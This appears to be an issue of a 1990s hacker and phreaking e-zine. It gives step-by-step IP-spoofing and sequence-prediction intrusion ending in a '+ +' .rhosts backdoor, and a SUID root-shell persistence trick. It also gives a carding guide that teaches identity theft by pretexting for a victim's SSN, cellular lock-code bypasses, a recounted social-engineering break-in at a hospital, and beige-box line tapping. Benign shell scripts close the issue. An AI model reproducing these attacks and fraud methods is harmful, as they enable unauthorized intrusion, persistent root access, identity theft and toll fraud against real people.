printf("1997 memor/hbs Usage : dns xxx.xxx.xxx \nfor searching from xxx.xxx.xxx.1 to xxx.xxx.xxx.255\n"); /* presentation thing and usage*/
}
_____________________________________________________________
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$ Connection Hijacking Attack! $$----------=========>>
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
God This is going to take a while!
This article includes all the goodies, and in complete detail tells
how to literally hack a server, using IP Spoofing, one of the most mis
understood terms in the underground. Stupid fuckers have been using IP
spoofing to go on irc and brag to their friends that they are k-rad. This
is not why ip spoofing came around, in this text I will explain to you, in
easy to understand language, that ip spoofing is just a step into the
process of gaining access to a server you are not supposed to have access
to.
The Basics
----------
In order to further understand what I am about to explain you must have a
general knowledge of several things that I will explain in the following
paragraphs...So no need to start to pout yet ;)
Three way Handshakes
--------------------
In order to start an actual data transfer of any kind on a network
you must have what you call a "three way handshake" it goes much like this.
You send what is called a SYN packet to a host, the SYN Packet has headers
which in turn tell the host that you want to connect to him, the host send
you back an ACK command, which tells you that its alive, and open for
connections, then you again send out an ACK Command to the host telling it
that your still alive, and the data transfer can begin. If that's a little
confusing, I agree, its confusing in words, but let me make a small diagram
on what a three way handshake looks like :
YOU --SYN-----> HOST
(You send out a SYN Packet to the host, telling it you want to connect)
YOU <--ACK----- HOST
(Host responds with an ACK or acknowledgment that it is alive and open)
YOU -----ACK--> HOST
(You respond back and the data transfer can now begin..)
Every time you do a regular data transfer on the internet such as
bring up a webpage this three way handshake commences. So now you know how
data gets from that machine to yours, this little information is the basis
of this attack.
.rhosts and trusted servers
---------------------------
Aright lets say you have in internet account, with a local Internet
service provider (ISP), AND you have an account with another server, which
gives you a shell account. A shell account is basically an account on the
servers UNIX operating system. They give you a home directory in which you
have access to the text editors such as Joe, and Pico, and you can also
work on c programs using the gcc compiler.
O.K. now lets say you want to save some time, so you want to make
the process of logging in to the shell account shorter, or maybe eliminate it
completely. Well due to the trust that a UNIX operating system has with its
users, this can be done, the process of entering a password at the login
screen can be illiminated. This can be done with a file called .rhosts, which
will grant or deny access based off the IP address of the person trying to
logon to the shell account its self.
The server that is in the .rhosts file is called the trusted server
for the fact that when it sees that IP address it trusts them. It thinks
that they are the person that is supposed, and allowed to be there. UNIX
will trust ANYONE with the specified ip address in the .rhosts file.
SYN Flooding
------------
A port on most UNIX operating systems can only handle a certain
number of connections to one port at a time, this is called the "backlog". If
the backlog is filled up all incoming SYN connections will be ignored.
Leaving them not allowed to connect to the server until the other
connecting requests are dealt with properly.
But if the SYN headers are spoofed when sent to the host the host
will keep on trying to successfully find the person who sent the original
syn message to it, and wont let anyone connect until it is done. Here's the
step of a SYN Flood
1) Person uses ip spoofer to spoof his original ip address and sends out a
several SYN packet to a specified port at a host.
2) The host's port gets flooded with SYN's and try's to reply to the SYN
command but cant because the person who sent the original SYN is not a
real host, leaving the ports closed, so no other connections can be made into
that host.
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST | From here on all other connections
YOU (Spoofed IP) --SYN-----> HOST | Will be ignored because all the
YOU (Spoofed IP) --SYN-----> HOST | connections are taken
YOU (Spoofed IP) --SYN-----> HOST |
X (Not really real) <--ACK-- HOST|
So in turn the HOST cannot find YOU (With the spoofed IP) so the port is left
flooded because the host will not drop the connections until they are fur
filled. After a bit the server will crash.. This is called a "Denial of
service attack" For the fact that it denies anyone else service to that host
you can read more about denial of service in this newsletter.
Sequence Numbers?
-----------------
Sequence Numbers are a prime factor in this attack, but also kinda
hard to explain. I only have a general knowledge of sequence numbers, but a
general knowledge is a hell of alot better then no knowledge ;) Every byte
that you transfer from one computer to another on a Internet network it is
assigned a sequence number. Sequence Numbers are assigned to make sure that
the connection that is made doesn't become corrupt.
Lets say we didn't have sequence numbers, then maybe by accident we
got a repeat of a byte, that would corrupt our data right there.
IN a three way handshake, the first sent SYN packet contains what is
called the Initial Sequence number, that sequence number tells the host what
the next sequence number is. (Confused yet) This will all come together when
I explain the attack at itself, its all got to do with timing and round
trip time.
Round trip time is how long it takes your SYN packet to reach the
host and the host to send back its ACK (acknowledgment) lets say you had to
do this all by hand, you send out the SYN command, and the host sends back
the ACK command, you have to calculate the exact sequence numbers timing
in order to send the ACK back to the host to start the data transfer.
-If the sequence number you send is a smaller number then what
the server expects it will just throw that try off, because it
thinks its an old packet that never reached or has failed before
-If the sequence number is exactly what the host expected, it will
let the ACK come through and the data transfer can begin.
-If the sequence number you send is greater then what the host
expects it will hold that sequence number, because it think that
it is a future bit, and it will hold it until the other bits
come through first..
Trust me this may all sound stupid now when I'm explaining it, but it all
does come together when I start explaining the attack, you need to be able
to spoof the ACK command that goes to the host when doing the 3 way handshake
Oh and each time a connection is made to the host that you are making
the connection to the sequence numbers goes up 64,000. The Incicial sequence
number goes up 128,000 every one second, and wraps every 9.32 hours. This
counting process will be needed later on in the attack..
The Attack
----------
I really cant express enough how much you need to understand the above
features before going and trying to execute this attack, just for the fact
that you will not be successful in your attempt, it took me 3 good days of
reading to readily understand sequence numbers, and I suggest you also read
all you can on sequence numbers, do searches, read internet protocol articles
just make sure you understand what you are doing before you get your hopes
up to find out that you didn't calculate the Round trip time right and you
end up with a smaller sequence number then originally intended. Its a bummer
and a waste of time if you don't understand it.
Short Explanation
-----------------
1)Choose the target
2)Find trusted host
3)SYN Flood trusted host
4)Spoof the trusted host
5)Guess the sequence numbers for the outgoing ACK
6)Make the connection
7)Leave a backdoor in the .rhosts file
Finding a Target
----------------
This should be fairly easy based on the fact that if your the kind
of person who has a personal vendetta with a server or you just want to try
this out on. Or you can get special permission from 2 hosts that will allow
you to do this as a security measure, that is probably the best way to go to
avoid any sorts of criminal prosecutions. I urge you to not in any way
incriminate yourself, this text is for security reasons only to inform, and
protect. This attack is NOT new, I did not make up this attack, I'm only
explaining it, and how to prevent it. So don't come crying to me when you get
raided and you have no where else to go. Stay safe and be paranoid.
Finding a targets Trusted Host
------------------------------
Once you have your target, you want to find out if it has a trusted
host, since you cant go into their computer and look to see if they even have
an .rhosts file you have to do the checking out yourself. If the target host
does not have a trusted host, this whole text is very pointless, but from
here on in, I am talking as if the target host does in fact have a trusted
host.
This is where you use your talent of social engineering. Finding the
trusted host is hard, Ill admit that, but if your going to go this far you
might as well find out about the system your going to hack, know what your
doing, know the system before you go in. Here is a list of possible ways
to maybe gain information about trusted hosts.
showmout -e target ->SHows where the file systems are exported
finger -l @target
finger -l @trustedserver.com
finger -l root@trustedserver.com
rpcinfo -p x-terminal
These are a couple of ways off the top of my head, but you can always
find shit out, Basically use your head in this matter, because well, this isn't
the hardest part of the attack, it may seem that way now, but it only gets
harder from here on out. Talk to a representative of the company, I dunno
read up on social engineering...
Over all this attack all comes down to trusted hosts, which are
inserted into the .rhosts file itself, this is why I spent a some time
explaining .rhosts files, because if you can become the trusted host you
also have access to the target host. Is this getting better by the minute or
what?
SYN Flood trusted host
----------------------
In order for this whole thing to go through the trusted host must be
taken out with a SYN flood (SYN Flood was discussed earlier in this article)
for the fact in later parts of this attack you need to spoof as the trusted
host then send out a SYN command to the target host's port to try to connect
to it, and if the host your attacking can send a message back to the trusted
host, it would get an error saying that host did not send out a SYN packet
for an opening connection, so in turn to make sure that does not happen. You
must flood the ports of the trusted host so no other connections can be made.
*NOTE* This is because you are flooding ports on the trusted host
and when the port in the trusted host is still looking for
someone to send back an ACK (It is still gagged by the SYN flood)
command to it doesn't let any other connections come through. So
you can successfully guess their sequence numbers that you guess
(IN time) that the trusted host would send to the target host.
SYN flooding software is readily available at many "Underground" sites
and I wont go into posting the code here for the fact I'm just wasting space
when you can do a search on the internet yourself and find it. For example a
very good spoofer/SYN flooder can be found at http://main.succeed.net/~coder.
But this NEEDS to be done, you don't need any interruption's in this attack.
Sample the sequence numbers
---------------------------
Because you are not the real host you are mearly a spoofed version of
the trusted host, you also have to spoof the return sequence number. Remember
in the three hand shake there is first a SYN from you, that tells the host
that you want a connection to its server, then the host sends back an ACK
or acknowledgment.
So if you spoof the trusted server and send out a SYN packet, the
server you just sent the SYN packet to will try to reply back. If you don't
guess the right sequence numbers (OR the timing of the transfer) it wont
let you log in. See if the REAL trusted host was available (Not under a SYN
flood) the real trusted host would have given the other host an error. But
with the SYN flood gumming up the works, and not allowing any other
connections, you can successfully spoof back the ACK back to the host so
you can connect.
Before you do the initial attack connect to one of the major ports
on the server your going to attack, like port 25 (The sendmail port) and
sample its sequence numbers. You need to calculate how long it takes for
Your SYN reaches the server and an SYN/ACK is sent back to you, then the
ACK you send back to the host, all in one. Do this many times until you have
enough you feel is a good diagram to round up and become a one figure.
Remember sequence numbers go up 128,000 a second, and 64,000 per connect.
-If the sequence number you send is a smaller number then what
the server expects it will just throw that try off, because it
thinks its an old packet that never reached or has failed before
-If the sequence number is exactly what the host expected, it will
let the ACK come through and the data transfer can begin.
-If the sequence number you send is greater then what the host
expects it will hold that sequence number, because it think that
it is a future bit, and it will hold it until the other bits
come through first..
Spoof the trusted host
----------------------
This is easy there are many ip spoofer software for linux and the
unix flavors, just pick one of these up and compile it. *NOTE* You must have
root on the linux operating system you are doing the attack from for the fact
that if you just have a regular home directory you cannot open up raw
connections in which are needed for a general spoof.
So load it up and spoof the address of the TRUSTED host, and go right
on to the next part.
The heart of the attack
-----------------------
This is the main part of the attack, once you are spoofed as the
trusted host, you should send a connection request to port 513 (The login
port) Then the host will then send back a SYN/ACK to the trusted host, which
is under the gagging of the SYN Flood so it wont accept anymore connections
hence it wont get an error back. While this is all going on we have to wait
for a bit for the SYN/ACK to be sent to the host. Now you must send an ACK
back to the host you are attacking with your guessed Sequence number attached
(Plus one because we are sending for a login) If your guess is correct it
will then accept your connection.
Type the magical word root and since that .rhosts file is there, and
you are spoofed as the trusted host, you will get automatic access to the
system. Isn't unix great? Trust is a great thing to encounter in any type
of linux operating system.
Once inside..
-------------
Since you really don't need to edit or destroy any log files, you are home
free, but as one last thing we do, we will put in a backdoor so we can
access their system as we please (No more of this spoofin shit) so we do a
cat + + >> ~/.rhosts . When you add a + + (as explained earlier) its basically
saying any host is allowed without entering a password. The only problem
with that alot of systems now adays are equipped with a program that looks
for .rhosts files that have a + + file..But oh well fuck it, your in it just
for the hack of it right?
Conclusion paragraph
--------------------
Basically this attack is very useful if you know what you are doing.
This wasn't as 'in depth' as I would have liked to go, but well, I'm not the
kind of person who can splash what's all in my head onto a piece of paper, its
easier for me to consume information then give it away. But I tried my best
and I hope you could understand it.
Id like to give a couple shoutouts to the people who made this
article happen. Phrack, Modify for teaching me the art of spell check, and
the whole 0 cr3w. Remember before asking a question, always try to answer it
yourself first.
Phe3r m3,
Merde Fuk
_____________________________________________________________
One method to keep root...............WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
First off, this is NOT a true hack since it requires that you have
root access to begin with. I'm including it only as a way to keep root once
you find it. I mean c`mon, how hard is it to write a simple script or batch
job to do a "who -a | grep root" every five minutes and log the output to a
file at $home/.root and tail it to an xterm window? Sooner or later root will
forget to log off! I've only managed to get this to work on a few *NIX
systems and Solaris 2.4.1 and higher has fixed this hole. But those assholes
at Santa Cruz Operations ...... *evil grin*
# cp /bin/sh $home/.root_shell
# chmod 4111 $home/.root_shell
These commands create a SUID root version of the Bourne shell ("stickey bit")
in the home directory of the user. I personally use a file name with a "."
just to keep prying eyes out. You can optionally use commands like "chmod g+s"
to execute a file as the GUID of the file. Assuming of course you have access
as the approiate group to begin with. Which is easy `cause people always
forget to log off (especially around lunch time :) )This would be handy in
case you want to look at payroll records in say the "accounting" group.
Once again, security compromise via stupid end users!
WaRsPrItE
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMd/HlH5eXk/jGmY7AQHPpQf/cn2vesmlxbIOdpIiVY53FUcoJmihsEuc
eTBMdCtyBibLxzVk9xak2GTtNcxppFphtLWh3v0f5aKF61NFSMsj7g1e1DcmMAn5
KTijlQc2pgB0OLhorsTA+/rSGl/TRa4uNVIYLpvCoU1H+5Y/kP8RuD1kgvgvl7Xe
R0zHmfqMYnRz5U8nedH2xagvnxnRixglt+bnYZS5/4fGuE9b2oz6iKbA7hG+ya9Q
rlTBvSd9uUw7nwtJgBdj7MMtlGwRhCUWP0pQBniYSbBOMfRZ22gL8is5lI2f8Tqh
To0YOe6T1dPvkYzYmvafz3F6IR5pnSltONeuUaeCSI3nBWGrpiaU/A==
=JVIc
-----END PGP SIGNATURE-----
-==-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=----=-=-=-=-=-=--=
Carding..more basics for the lame... BY ArcAngl
To check if a CC # is valid phone 1-800-228-1122 (need merchant # usually 5 digits)
To obtain a valid credit card under someone else's name:
1. Identify a target name, such as one of your teachers, co-workers, ect...
2. Once you have a target name, you need to obtain their SSN. This can be done in many ways
using social engineering. For example: call up the target's electric company, saying you are
him, and that you need to make a change to you mailing information possibly. Ask them what
information they have on record. Then say, also, Id like to verify my SSN that you have, I had a mix up a
few years ago, and I want to make sure you have the correct one...what do you have?
3. Once you have the targets SSN, obtain a Visa/MasterCard application. You can find these in many
places: banks, magazine inserts, ect...or simply call and request one. Once you have the application,
simply fill out the form with the targets name. Now the hard part: for the address, you will need to have
a place that you have access to the mail delivery. DO NOT USE YOUR OWN! You may try: neighbors
on extended vacation, house where people just moved out, house just built, a friend that will deny any
receipt of a card, ect...you get the picture. Then fill in the targets SSN and the rest of the info. Then
simply mail it! You may also call in the info and ask for overnight processing. Do this from a payphone, or op divert
for the uberelite!
4. The new card will be sent to the address you specified. It will be a valid card, in the targets name and
all charges will reflect on the targets credit report. It will take months for the target to realize there is a
card out there in his name. You have the physical card in your possession...how many times does
WalMart ask for ID when charging a new Pentium? NONE!!!! Oh yeah...watch for cameras that will id
you!
_____________________________________________________________
Cellular Programming Archives, Pt. I from Phrax
Phrax has been kind enough to provide everyone with a large
volume of information on cellular phone programming for about every
phone out there. Over the next few months, THTJ will be posting
cellular information from the large archive that Phrax has collected.
And, as always, this information is for informative purposes only, so
we know you will only use it for that, and not to phreak some phones
..... ( yea right! ).
-------
AUDIOVOX BC40, 45, CMT400, 405, 410, 450, 550, 600, 605, 750, 1700, SP75
NOTES: This is a single NAM unit.
The ESN prefix is 138 decimal, 8A hex (Toshiba)
You MUST know the lock code to program this unit.
Audiovox: 516-231-6051/213-926-7758
NAM programing:
1. With the power turned on enter N N N FUNC # 1, where NNN is the three
digit lock code. The manufacturers default is 000
2. The # key increments the step number.
3. The * key decrements the step number.
4. STO enters the data for each step.
5. You MAY directly access any step by pressing RCL followed by the step
number.
6. FUNC SND completes programing.
7. FUNC CLR exits programing mode.
PROGRAMING DATA:
STEP# #OF DIGITS/RANGE DESCRIPTION
01 3 DIGITS FIRST THREE DIGITS OF PHONE NUMBER
02 4 DIGITS LAST FOUR DIGITS OF PHONE NUMBER
03 3 DIGITS LOCK CODE
04 3 DIGITS AREA CODE
05 00001 - 32767 SYSTEM ID
06 0 OR 1 HORN ALERT
07 0 OR 1 HANDS FREE
08 0 OR 1 CONTINUOUS DTMF
09 0 OR 1 REPERTORY DIALLING
10 00 TO 15 GROUP ID (10 FOR USA)
11 00 TO 15 ACCESS OVERLOAD CLASS
12 0000 (ONLY) STATION CLASS MARK
13 0 OR 1 LOCAL USE MARK
14 0 OR 1 MIN MARK
15 0333/0334 IPCH, AUTOMATICALLY SET
16 0 OR 1 PREFERRED SYSTEM, AUTOMATICALLY SET
17 000 TO 255 SEE NOTE 1 BELOW
18 000 SET TO 000 ONLY
19 000 SET TO 000 ONLY
20 00001 - 99999 SYSTEM ID INHIBIT
21 0 TO 31 HORN ALERT TIME OUT IN HOURS (CMT 550 ONLY)
22 0 TO 31 ELEC MESSAGE RECORDER TIME OUT IN HOURS
(CMT 550 ONLY). SEE ALSO NOTE 2 BELOW.
23 0 TO 255 NO CHARGE AIR TIME DELAY IN SECS (NOT ALL MODELS)
24 000 TO 999 AIR TIMER CLEAR CODE
25 000 SET TO 000 ONLY
26 CHECKSUM AUTOMATICALLY SET
27 CHECKSUM AUTOMATICALLY SET
NOTES:
1. These options can be selected by adding together the following
codes:
0 = No options,
1 = Preferred system lock (not on CMT 550)
2 = Auto Lock (CMT 550 only),
4 = Call timer beep CMT 550 only),
8 = Home Roam inhibit,
16 = Automatic system redial (CMT 550 only).
Add together the codes of the desired options, for example to select
Call timer beep and auto redial add 4 to 16 for a code of 020.
2. 1 to 31 hours, except that a setting of 0 will turn phone off after
8 hours.
LOCK: F 4. UNLOCK: Enter three digit code.
A/B SYSTEM SELECT:
This procedure only works on models manufactured after September 19, 1987.
The first two digits of the serial number indicate the month (01-12), the
third digit of the serial number indicates the last digit of the year (198n).
FCN 7 STO = PREFERRED SYSTEM,
FCN 8 STO = HOME SYSTEM ONLY,
FCN 9 STO = NON PREFERRED SYSTEM,
FCN 0 SWITCHES BETWEEN A/B AND B/A,
PRESS STO WHEN THE DESIRED OPTION IS DISPLAYED.
------
AUDIOVOX CTX1500, 2500, 4000, 5000, BC410, 55, SP85, TRANS 410.
NOTES: These are single NAM units.
The ESN prefix is 138 decimal, 8A hex (Toshiba)
You MUST know the lock code to program this unit, see below for
"back door" programing methods.
Audiovox: 516-231-6051/213-926-7758
NAM programing:
1. With the power turned on enter N N N FUNC # 1, where NNN is the three
digit lock code. The manufacturers default is 000
2. The # key increments the step number.
3. The * key decrements the step number.
4. STO enters the data for each step.
5. You MAY directly access any step by pressing RCL followed by the step
number.
6. FUNC SND completes programming.
7. FUNC CLR exits programming mode.
PROGRAMING DATA:
STEP# #OF DIGITS/RANGE DESCRIPTION
01 10 DIGITS MIN (AREA CODE & PHONE NUMBER)
02 3 DIGITS LOCK CODE
03 00000 - 99999 SYSTEM ID
04 00 - 15 ACCESS OVERLOAD CLASS
05 00 - 15 SYSTEM ID (10 FOR USA)
06 0 OR 1 LOCAL USE MARK
07 0 OR 1 MIN MARK
08 0333 OR 0334 INITIAL PAGING CHANNEL
09 0 OR 1 PREFERRED SYSTEM
10 4 DIGITS STATION CLASS MARK
11 8 BINARY DIGITS FUNCTION 1, SEE NOTE 1 BELOW
12 8 BINARY DIGITS FUNCTION 2, SEE NOTE 2 BELOW
13 00 TO 31 HOURS POWER OFF TIMER (CTX 4000 ONLY)
14 000 TO 255 SECS NO CHARGE AIR TIMER DELAY
15 3 DIGITS CALL TIMER RESET CODE
16 - 20 00000 - 99999 SIDH INHIBIT # 1 THRU # 5
21 - 25 NOT USED FUTURE USE
NOTES:
1. This is an eight digit binary field.
10000000 = CALL TIMER BEEP
01000000 = AUTO LOCK
00100000 = AUTO SYSTEM REDIAL
00010000 = CALL RESTRICTION
00001000 = 32 DIGIT DIALING CAPABILITY
11111000 = ALL OF THE ABOVE
2. As above but options are:
10000000 = HANDS FREE
01000000 = CONTINUOUS DTMF
00100000 = REPERTORY DIALING
00010000 = HORN ALERT
00001000 = ALLOWS 911 CALLING WHEN UNIT IS LOCKED
01101000 = ALL OF THE ABOVE
A/B SYSTEM SELECT:
FCN 0 4 DISPLAYS CURRENT MODE,
FCN 0 0 = PREFERRED/NON-PREFERRED,
FCN 0 1 = PREFERRED ONLY,
FCN 0 2 = HOME ONLY
FCN 0 3 = NON PREFERRED ONLY,
"BACK DOOR" PROCEDURES:
We cannot guarantee the accuracy of these procedures, USE CAUTION!
SP 85
The lock code can be reset to 000 be shorting pins 6 and 17 on the handset
control conector.
CTX SERIES
Short pins 6 an 17 on the data cable, turn power on and enter 000 FUNC # 1.
TRANS 55 AND BC 55
Ground pin 1 of the six pin connector next to the modular jack on the
tranceiver. Looking at the tranciever with the modular jack to the right
of the six pin connector, pin one is bottom right.
LOCK: Press LOCK. UNLOCK: Enter three digit code.
SYSTEM SELECT: F 0 4 shows current mode. F 0 0 = Pref/Non pref, F 0 1 = Pref
only, F 0 2 = Home Only, F 0 3 = Non pref only.
------
Well this is all for this month, tune in next month for more
information.
_____________________________________________________________
Basic Social Engineering...............WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
I hesitate to even type this up and submit it for distribution. But I
want to make the point,that hacking takes RESEARCH! The easiest way to gain
access to somebody's account is to just ask them for their password.Here's a
perfect example.
One day visiting my Mom at work I was in the IS department at my
local hospital. I noticed a modem labeled "Dial Up" followed by the phone
number. So just for giggles I called it and saw.
<name of the hospital>
Medical Manager
SCO Unix release 2.3.4
login:
I went to the hospital the next day and found an old WYSE60 terminal with the
same login screen sitting on one of the desks. But the terminal also had a
sticker on it from the vendor advertising their support line. "In case of
trouble call <company name> 1-800-555-XXXX". Making a mental note of the
vendor's name I glanced down at the phone and made another mental note of an
inside line phone number. The next day I called the office on the inside line
and the conversation went something like this.
Office girl:
"<name of the department> Jackie speaking.How may I help you?"
Me:
"Hi Jackie! This is <fake name> calling from <company name>. How are
you?"
Office girl:
"Good. What can I do for you?"
Me:
"Well, we've been really busy here lately. We're upgrading the
cryptographic algorithm on your primary domain controller. As well as
re-compiling the user accounts database. And I thought I'd call
office to office to make sure that everyone could get in OK. Could
you log out and log back in for me?"
Office girl:
"Sure, no problem. Just a minute. Do I just enter "jjohnson" and
my password like always?"
Me:
"Wait a second and I'll dial in and check. You said you enter
"jjohnson"? And what password?"
Office girl:
"medical"
Me:
"All lower case?"
Office girl:
"yes"
Me:
"Well,<dramatic pause> it looks good on my end. Why don't you go
ahead and try"
Office girl:
"Ok....<long pause>......Ok I'm in!"
Me:
"Great! Thanks, if you run into problems give me a call here at
the office"
The thing that struck me about her password was it was "medical"
which was also apart of the title of the software package that they were
using. It sounded alot like the default password that came installed when the
vendor installed all the user accounts.So I promptly dialed in, logged in as
"jjohnson" with a password of "medical". The bummer was that I was within a
program and couldn't reach a shell prompt. No problem, I entered "!" (like
hacking PINE) and bingo, a "$" appeared. After that,I did a cat of
/etc/passwd to get a listing of all the logins. Notice I didn't do "shadow"
all I would've got is an "access denied" and a possible entry on the admin's
log. After that i logged off and checked all the other logins to see if they
were also using the defaut password of "medical". Sure enough,7 were!! It is
important to try this in case "Jackie" gets paranoid and calls the support
line and has her password changed. Then you're back to square one. The moral
of this story is, I managed to compromise the security of a major hospital
just by being friendly and confusing the office help. No k-rAd 3l33t3 haX
here, just stupid end users :) !
WaRsPrItE
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMd/IkH5eXk/jGmY7AQGR0Af/UTrFWHAjsWIsCBXha+LSAqtJ68548Khw
9ye7ug1HAVU9Mu5JmbmwoKcIoavfNeLPB/35zMAnCPmpFf92US8bCSAe1MbRrmQL
uzwqDjuo0SX/hco+HSqhd6fnajoGp9rqxEpq3QdwQ+/b9I8YTEraw30Yq+yA/Rsg
jtOmnAKvTlb/jSsvg8wmX0xqfTJZANIOvDFXa2+sVGwuY5uh9symfMKmUXzrpNQC
EZUtKMJnqVzpwIhZJPLAawgnFDbAu8mT8UZ/BQVJ/GeyaVwiDe8VzkuiACDY418f
kRFWDNSObbadWVuLoGxo9Ag6hfhquuptrRx8SJm19OgeUzam1dXX0Q==
=f/5Y
-----END PGP SIGNATURE-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
DTMF Decoding - By ArcAngl
Ok, I have had the shits of having newbies beg for info on HOW TO DECODE DTMFs!!
So here it is.... 2 ways of many!
software:
WWW.Cyberramp.net/~shima/index.html
It will only decode 4 digits at a time with the shareware version, but if
you're clever, you record the wav file then edit it into pieces to decode
whole #'s.
...or
If you're clever, you will record the number, then dial your own pager #
and play it back into the phone, and press the pound sign when done. The
pager will show the # in a minute. ;-
_____________________________________________________________
-------------
--=[Redneck Phreaking]=--
By Shoelace
-------------
Hola! Shoelace here, writing a small, lame entry to inform people
near me, and in other places down South, about how easy it really is to
get even the simplest phreaking in. Contrary to popular belief, there are
phreaks in Tennessee. In my town, we have only 5 that I know of. The most
noted of course, is dr1x/kz. I think only three of us have modified our
Tone Dialers to make them into Red Boxes, with the help of Acid_novA. But,
the most simplest of all phreaking here, or at least in East Tennessee, is
Beige Boxing. You don't even need aligator clips, or really anything else
in the help files about Beige Boxing that you have probably read. All you
need is a screwdriver, and a regular phone. You see, behind all the houses
are these grayish colored boxes of varies sizes. They usually say
"Telephone Network Interface" on them. They are attached by screws. Unscrew
it, and open it up. You will see one, maybe two (if they have two lines),
holes with phone jacks in them. Take out that jack, and put in your phone.
You should have dialtone. Ta da! That is how easy it is to Beige Box down
South. I don't know what other states have their boxes like this, but if you
do, don't delay! Go out and Beige Box!
-Shoelace
-http://www.public.usit.net/sltaylor
-------
--=[The End]=--
-------
_____________________________________________________________
Basic UNIX Scripting...................WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
Here's some basic UNIX scripts that I found useful for searching a
system for log files, grep'ing for possible entries, and traversing
directory trees.These were written for SCO UNIX.
# .kshrc -- Commands executed by each Korn shell at startup
# Copyright (c) 1990, The WaRsPrItE Corporation Inc. =]
# All rights reserved.
# If there is no VISUAL or EDITOR to deduce the desired edit
# mode from, assume vi(C)-style command line editting.
if [ -z "$VISUAL" -a -z "$EDITOR" ]; then
set -o vi
fi
TMOUT=300
info()
{
echo "\nDate `date '+%m/%d/%y %H:%M'`\n"
echo "logname `logname`"
echo "Parent PID $PPID"
echo "Old pwd $OLDPWD"
echo "On `expr $SECONDS / 60` minutes"
echo "Path $PATH"
echo "cd path $CDPATH"
echo "Home $HOME"
echo "Time out $TMOUT"
echo "Current Jobs `jobs`"
echo "Spooler `lpstat`"
}
#-----------------------------------------------------------------
# Change Directory
# Changes directory and sets the new PS1 variable
#-----------------------------------------------------------------
ccd()
{
if [ $1 ]
then
cd $1
PS1="!_`logname`_`pwd`> "
fi
}
#-----------------------------------------------------------------
# List DIRectories
#-----------------------------------------------------------------
ldir()
{
l -F $1 | grep / | more
}
#-----------------------------------------------------------------
# File Find
# Recursively looks for a file from the working directory
#-----------------------------------------------------------------
ffind()
{
if [ $# = 1 ]
then
find . -name $1 -print
else
echo "Usage: ffind <filename>"
fi
}
#-----------------------------------------------------------------
# Recursive Grep
# Search's all files below working for search string
#-----------------------------------------------------------------
rgrep()
{
if [ $# = 1 ]
then
echo "Searching: $1"
find . -local -exec grep -il $1 {} \;
else
echo "rgrep: Invalid number of arguments"
fi
}
#-----------------------------------------------------------------
# Recursive Chmod
#-----------------------------------------------------------------
rchmod()
{
if [ $# = 1 ]
then
find . -local -exec chmod $1 {} \;
else
echo "Usage: rchmod <mode>"
fi
}
#-----------------------------------------------------------------
# Recursive Chown
#-----------------------------------------------------------------
rchown()
{
if [ $# = 1 ]
then
find . -local -exec chown $1 {} \;
else
echo "Usage: rchown <owner>"
fi
}
#-----------------------------------------------------------------
# Recursive Chgrp
#-----------------------------------------------------------------
rchgrp()
{
if [ $# = 1 ]
then
find . -local -exec chgrp $1 {} \;
else
echo "Usage: rchgrp <group>"
fi
}
alias cd="ccd"
alias home="cd $HOME ; clear ; m"
alias .l="history"
alias .x="fc -e -"
alias .e="fc -e vi "
#-----------------------------------------------------------------
# Total the size of the file in current directory
#-----------------------------------------------------------------
total()
{
clear
l $1 | awk '
{ if ( $1 != "total" ) {
counter = counter + $5
printf("%10s %s %s\n",counter, $0, system("file ",$1) }} ' | more
}
#-----------------------------------------------------------------
# Easy Change Directory
#
# I found this in a sys admin forum and modified it. Changed the
# home of the ecd files to /tmp to save room on the system. If
# you want everyone to have their own list just change the /tmp's
# to $HOME. Sorry the modules are not very well documented, it was
# late and I concentrated more on the code.
#
# Scott
#-----------------------------------------------------------------
ecd()
{
if [ $FCD ]
then
echo "sorry.."
return
else
FCD="Fcd"
export FCD
fi
echo
echo "Loading ecd: type \"ecd\" for information"
#-----------------------------------------------------------------
# add a directory to the list
#-----------------------------------------------------------------
addline()
{
error=0
echo "Enter full path of $Newline: \c"
read Fullpath
if [ -d $Fullpath ]
then
echo $Fullpath >> /tmp/ecd.list
else
echo "Sorry, can't find that directory!"
error=1
fi
}
#-----------------------------------------------------------------
# usage
#-----------------------------------------------------------------
function usage
{
echo "\n"
echo "Easy Change Directory:"
echo
echo "Usage: ecd directory-name"
echo " ecd -e directory for extended search."
echo " ecd -p to add current direcory to list."
echo " ecd -r to recursively scan directories under current."
echo "\n"
}
#-----------------------------------------------------------------
# main Loop
#-----------------------------------------------------------------
function ecd
{
error=0
FileDir=/tmp/ecd.list
Duplist=/tmp/ecd.dup
if [ $# = 0 ]
then
usage
return 0
fi
Extend="NO"
#-----------------------------------------------------------------
# Check for right parameters
#-----------------------------------------------------------------
case $1 in
"-e")
if [ $# != 2 ]
then
echo "Error: insufficient parameters ($#)"
echo "Usage: ecd -e directory"
fi
Extend="YES"
shift
;;
"/")
ccd /
return 0
;;
"-p")
CurDir=$(pwd)
grep "$CurDir\$" $FileDir > /dev/nul
if [ $? != 0 ]
then
echo $CurDir >> $FileDir
return 0
else
echo "Current directory $CurDir\n is already in $FileDir"
return 1
fi
;;
"-r")
echo "Scanning direcotories under $PWD"
find $PWD -type d -print >> $FileDir
cat "$FileDir" | sort | uniq > $Duplist
if [ $? = 0 ]
then
echo "Sorted and cleaned up $FileDir"
echo
mv $Duplist $FileDir
fi
return 0
;;
esac
#-----------------------------------------------------------------
# Does a list exist? if not make one
#-----------------------------------------------------------------
if [ ! -f $FileDir ]
then
echo "Creating new $FileDir in /tmp. It may take a while..."
find /tmp -type d -print > $FileDir
fi
#-----------------------------------------------------------------
# Check the list
#-----------------------------------------------------------------
if [ $Extend = "YES" ]
then
grep $1 $FileDir > $Duplist
else
grep $1'$' $FileDir > $Duplist
fi
